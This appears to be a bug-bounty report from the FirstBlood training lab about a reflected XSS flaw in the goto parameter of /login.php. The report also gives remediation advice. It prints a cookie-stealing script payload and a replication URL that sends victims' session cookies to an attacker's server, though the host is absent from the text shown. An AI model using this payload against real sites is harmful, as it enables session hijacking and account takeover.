FirstBlood-#364RXSS on login.php leads to account takeover
This issue was discovered on FirstBlood v2

On 2021-10-25, 0x1452 Level 3 reported:



The endpoint /login.php is vulnerable to reflected XSS, caused by the goto parameter. Its value is reflected inside the value argument of an <input> tag without proper sanitization.

The following payload will allow an attacker to steal the session cookies of anyone clicking their link: "><script/x>document.location="//"%2bdocument.cookie</script/x>

This is how it gets reflected:

<input name="goto" value="">

The attacker can now read the cookies from their server's logs and take over the victim's account.

To replicate this, simply navigate to /login.php?goto=yo123"><script/x>document.location="//"%2bdocument.cookie</script/x>.


  • Properly sanitize the value of goto before reflecting it
  • Make session cookies HttpOnly to lower the impact of XSS
  • Add strong CSP rules if possible to further lower the impact of XSS

P3 Medium

Endpoint: /login.php

Parameter: goto

Payload: "><script/x>document.location="//"%2bdocument.cookie</script/x>

FirstBlood ID: 26
Vulnerability Type: Reflective XSS

The developers thought they had fixed ?goto= when reflected in an input tag on login.php from a similar bug (ID 39), but because this endpoint uses legacy code their changes were not applied here and thus the XSS was forgotten.